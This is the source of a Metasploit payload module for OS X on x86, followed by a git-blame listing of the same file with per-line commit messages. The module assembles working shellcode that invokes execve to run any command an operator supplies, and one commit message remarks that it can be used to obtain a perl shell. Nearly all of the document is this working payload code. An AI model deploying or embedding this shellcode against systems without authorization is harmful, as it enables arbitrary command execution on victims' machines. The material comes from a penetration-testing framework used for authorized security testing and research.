metasploit-framework/modules/payloads/singles/osx/x86/exec.rb

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##


require 'msf/core'


###
#
# Exec
# ----
#
# Executes an arbitrary command.
#
###
module Metasploit3

	include Msf::Payload::Single
	include Msf::Payload::Osx

	def initialize(info = {})
		super(merge_info(info,
			'Name'          => 'OS X Execute Command',
			'Description'   => 'Execute an arbitrary command',
			'Author'        => [ 'snagg <snagg[at]openssl.it>',
			                     'argp <argp[at]census-labs.com>',
			                     'joev <jvennix[at]rapid7.com>' ],
			'License'       => BSD_LICENSE,
			'Platform'      => 'osx',
			'Arch'          => ARCH_X86
		))

		# Register exec options
		register_options(
			[
				OptString.new('CMD',  [ true,  "The command string to execute" ]),
			], self.class
		)
	end

	#
	# Dynamically builds the exec payload based on the user's options.
	#
	def generate_stage
		cmd_str   = datastore['CMD'] || ''
		# Split the cmd string into arg chunks
		cmd_parts = Shellwords.shellsplit(cmd_str)
		# the non-exe-path parts of the chunks need to be reversed for execve
		cmd_parts = ([cmd_parts.first] + (cmd_parts[1..-1] || []).reverse).compact
		arg_str = cmd_parts.map { |a| "#{a}\x00" }.join

		# Stuff an array of arg strings into memory
		payload =  "\x31\xc0" +                       # xor eax, eax  (eax => 0)
		           Rex::Arch::X86.call(arg_str.length) + # jmp over CMD_STR, stores &CMD_STR on stack
		           arg_str +
		           "\x5B"                             # pop ebx (ebx => &CMD_STR)

		# now EBX contains &cmd_parts[0], the exe path
		if cmd_parts.length > 1
			# Build an array of pointers to arguments
			payload += "\x89\xD9" +                   # mov ecx, ebx
			           "\x50" +                       # push eax; null byte (end of array)
			           "\x89\xe2"                     # mov edx, esp (EDX points to the end-of-array null byte)
			cmd_parts[1..-1].each_with_index do |arg, idx|
				# can probably save space here by doing the loop in ASM
				# for each arg, push its current memory location on to the stack
				payload += "\x81\xC1" +               # add ecx, ...
				           [cmd_parts[idx].length+1].pack('V') +
				                                      # (cmd_parts[idx] is the prev arg)
				           "\x51"                     # push ecx (&cmd_parts[idx])
			end
			payload += "\x53" +                       # push ebx (&cmd_parts[0])
			           "\x89\xe1" +                   # mov ecx, esp (ptr to ptr to first str)
			           "\x52" +                       # push edx
			           "\x51"                         # push ecx
		else
			# pass NULL args array to execve() call
			payload += "\x50\x50"                     # push eax, push eax
		end

		payload += "\x53" +                           # push ebx
		           "\xb0\x3b" +                       # mov al, 0x3b (execve)
		           "\x50" +                           # push eax
		           "\xcd\x80"                         # int 0x80 (triggers execve syscall)

		payload
	end
end
Fixes #188. This adds an exec stage to the OSX payloads git-svn-id: file:///home/svn/framework3/trunk@5405 4d416f70-5f16-0410-b530-b9f4589650da 2008-02-09 07:58:38 +00:00			`##`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`# This file is part of the Metasploit Framework and may be subject to`
Fixes #188. This adds an exec stage to the OSX payloads git-svn-id: file:///home/svn/framework3/trunk@5405 4d416f70-5f16-0410-b530-b9f4589650da 2008-02-09 07:58:38 +00:00			`# redistribution and commercial restrictions. Please see the Metasploit`
Fix up the boilerplate comment to use a better url 2012-02-21 01:40:50 +00:00			`# web site for more information on licensing and terms of use.`
			`# http://metasploit.com/`
Fixes #188. This adds an exec stage to the OSX payloads git-svn-id: file:///home/svn/framework3/trunk@5405 4d416f70-5f16-0410-b530-b9f4589650da 2008-02-09 07:58:38 +00:00			`##`


			`require 'msf/core'`


			`###`
			`#`
			`# Exec`
			`# ----`
			`#`
			`# Executes an arbitrary command.`
			`#`
			`###`
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. git-svn-id: file:///home/svn/framework3/trunk@5709 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-02 05:23:59 +00:00			`module Metasploit3`
Fixes #188. This adds an exec stage to the OSX payloads git-svn-id: file:///home/svn/framework3/trunk@5405 4d416f70-5f16-0410-b530-b9f4589650da 2008-02-09 07:58:38 +00:00
			`include Msf::Payload::Single`
Related to #885 , allow Prepend* for osx/x86/exec payload 2012-10-16 14:26:18 +00:00			`include Msf::Payload::Osx`
Fixes #188. This adds an exec stage to the OSX payloads git-svn-id: file:///home/svn/framework3/trunk@5405 4d416f70-5f16-0410-b530-b9f4589650da 2008-02-09 07:58:38 +00:00
			`def initialize(info = {})`
			`super(merge_info(info,`
Correct OSX naming. See ticket #7182 2012-08-14 20:29:21 +00:00			`'Name' => 'OS X Execute Command',`
Fixes #188. This adds an exec stage to the OSX payloads git-svn-id: file:///home/svn/framework3/trunk@5405 4d416f70-5f16-0410-b530-b9f4589650da 2008-02-09 07:58:38 +00:00			`'Description' => 'Execute an arbitrary command',`
Kill extra whitespace. 2013-07-18 16:30:54 +00:00			`'Author' => [ 'snagg <snagg[at]openssl.it>',`
Convert to readable asm. Adds support for arguments. * shellcode appears to do an unnecessary copy-to-stack, so will look into improving that. 2013-07-18 00:20:47 +00:00			`'argp <argp[at]census-labs.com>',`
			`'joev <jvennix[at]rapid7.com>' ],`
Fixes #188. This adds an exec stage to the OSX payloads git-svn-id: file:///home/svn/framework3/trunk@5405 4d416f70-5f16-0410-b530-b9f4589650da 2008-02-09 07:58:38 +00:00			`'License' => BSD_LICENSE,`
			`'Platform' => 'osx',`
Change to += syntax. 2013-07-18 02:11:24 +00:00			`'Arch' => ARCH_X86`
			`))`
Fixes #188. This adds an exec stage to the OSX payloads git-svn-id: file:///home/svn/framework3/trunk@5405 4d416f70-5f16-0410-b530-b9f4589650da 2008-02-09 07:58:38 +00:00
fix comments git-svn-id: file:///home/svn/framework3/trunk@10995 4d416f70-5f16-0410-b530-b9f4589650da 2010-11-11 22:19:34 +00:00			`# Register exec options`
Fixes #188. This adds an exec stage to the OSX payloads git-svn-id: file:///home/svn/framework3/trunk@5405 4d416f70-5f16-0410-b530-b9f4589650da 2008-02-09 07:58:38 +00:00			`register_options(`
			`[`
			`OptString.new('CMD', [ true, "The command string to execute" ]),`
Convert to readable asm. Adds support for arguments. * shellcode appears to do an unnecessary copy-to-stack, so will look into improving that. 2013-07-18 00:20:47 +00:00			`], self.class`
			`)`
Fixes #188. This adds an exec stage to the OSX payloads git-svn-id: file:///home/svn/framework3/trunk@5405 4d416f70-5f16-0410-b530-b9f4589650da 2008-02-09 07:58:38 +00:00			`end`

			`#`
fix comments git-svn-id: file:///home/svn/framework3/trunk@10995 4d416f70-5f16-0410-b530-b9f4589650da 2010-11-11 22:19:34 +00:00			`# Dynamically builds the exec payload based on the user's options.`
Fixes #188. This adds an exec stage to the OSX payloads git-svn-id: file:///home/svn/framework3/trunk@5405 4d416f70-5f16-0410-b530-b9f4589650da 2008-02-09 07:58:38 +00:00			`#`
Related to #885 , allow Prepend* for osx/x86/exec payload 2012-10-16 14:26:18 +00:00			`def generate_stage`
Convert to readable asm. Adds support for arguments. * shellcode appears to do an unnecessary copy-to-stack, so will look into improving that. 2013-07-18 00:20:47 +00:00			`cmd_str = datastore['CMD'] \|\| ''`
			`# Split the cmd string into arg chunks`
Shellwords! Now you can use exec to get you a perl shell 2013-07-18 02:15:59 +00:00			`cmd_parts = Shellwords.shellsplit(cmd_str)`
Removes unnecessary copy-to-stack. Fixes arg-order issue. * Now I simply point to the string in instruction-memory, which saves a few bytes. 2013-07-18 00:21:52 +00:00			`# the non-exe-path parts of the chunks need to be reversed for execve`
			`cmd_parts = ([cmd_parts.first] + (cmd_parts[1..-1] \|\| []).reverse).compact`
Convert to readable asm. Adds support for arguments. * shellcode appears to do an unnecessary copy-to-stack, so will look into improving that. 2013-07-18 00:20:47 +00:00			`arg_str = cmd_parts.map { \|a\| "#{a}\x00" }.join`

Removes unnecessary copy-to-stack. Fixes arg-order issue. * Now I simply point to the string in instruction-memory, which saves a few bytes. 2013-07-18 00:21:52 +00:00			`# Stuff an array of arg strings into memory`
Change to += syntax. 2013-07-18 02:11:24 +00:00			`payload = "\x31\xc0" + # xor eax, eax (eax => 0)`
			`Rex::Arch::X86.call(arg_str.length) + # jmp over CMD_STR, stores &CMD_STR on stack`
			`arg_str +`
			`"\x5B" # pop ebx (ebx => &CMD_STR)`
Convert to readable asm. Adds support for arguments. * shellcode appears to do an unnecessary copy-to-stack, so will look into improving that. 2013-07-18 00:20:47 +00:00
Removes unnecessary copy-to-stack. Fixes arg-order issue. * Now I simply point to the string in instruction-memory, which saves a few bytes. 2013-07-18 00:21:52 +00:00			`# now EBX contains &cmd_parts[0], the exe path`
Convert to readable asm. Adds support for arguments. * shellcode appears to do an unnecessary copy-to-stack, so will look into improving that. 2013-07-18 00:20:47 +00:00			`if cmd_parts.length > 1`
Shellwords! Now you can use exec to get you a perl shell 2013-07-18 02:15:59 +00:00			`# Build an array of pointers to arguments`
Change to += syntax. 2013-07-18 02:11:24 +00:00			`payload += "\x89\xD9" + # mov ecx, ebx`
			`"\x50" + # push eax; null byte (end of array)`
			`"\x89\xe2" # mov edx, esp (EDX points to the end-of-array null byte)`
Convert to readable asm. Adds support for arguments. * shellcode appears to do an unnecessary copy-to-stack, so will look into improving that. 2013-07-18 00:20:47 +00:00			`cmd_parts[1..-1].each_with_index do \|arg, idx\|`
			`# can probably save space here by doing the loop in ASM`
			`# for each arg, push its current memory location on to the stack`
Change to += syntax. 2013-07-18 02:11:24 +00:00			`payload += "\x81\xC1" + # add ecx, ...`
			`[cmd_parts[idx].length+1].pack('V') +`
			`# (cmd_parts[idx] is the prev arg)`
			`"\x51" # push ecx (&cmd_parts[idx])`
Convert to readable asm. Adds support for arguments. * shellcode appears to do an unnecessary copy-to-stack, so will look into improving that. 2013-07-18 00:20:47 +00:00			`end`
Change to += syntax. 2013-07-18 02:11:24 +00:00			`payload += "\x53" + # push ebx (&cmd_parts[0])`
			`"\x89\xe1" + # mov ecx, esp (ptr to ptr to first str)`
			`"\x52" + # push edx`
			`"\x51" # push ecx`
Convert to readable asm. Adds support for arguments. * shellcode appears to do an unnecessary copy-to-stack, so will look into improving that. 2013-07-18 00:20:47 +00:00			`else`
			`# pass NULL args array to execve() call`
Change to += syntax. 2013-07-18 02:11:24 +00:00			`payload += "\x50\x50" # push eax, push eax`
Convert to readable asm. Adds support for arguments. * shellcode appears to do an unnecessary copy-to-stack, so will look into improving that. 2013-07-18 00:20:47 +00:00			`end`
Fixes #188. This adds an exec stage to the OSX payloads git-svn-id: file:///home/svn/framework3/trunk@5405 4d416f70-5f16-0410-b530-b9f4589650da 2008-02-09 07:58:38 +00:00
Change to += syntax. 2013-07-18 02:11:24 +00:00			`payload += "\x53" + # push ebx`
			`"\xb0\x3b" + # mov al, 0x3b (execve)`
			`"\x50" + # push eax`
			`"\xcd\x80" # int 0x80 (triggers execve syscall)`
Convert to readable asm. Adds support for arguments. * shellcode appears to do an unnecessary copy-to-stack, so will look into improving that. 2013-07-18 00:20:47 +00:00
			`payload`
			`end`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`end`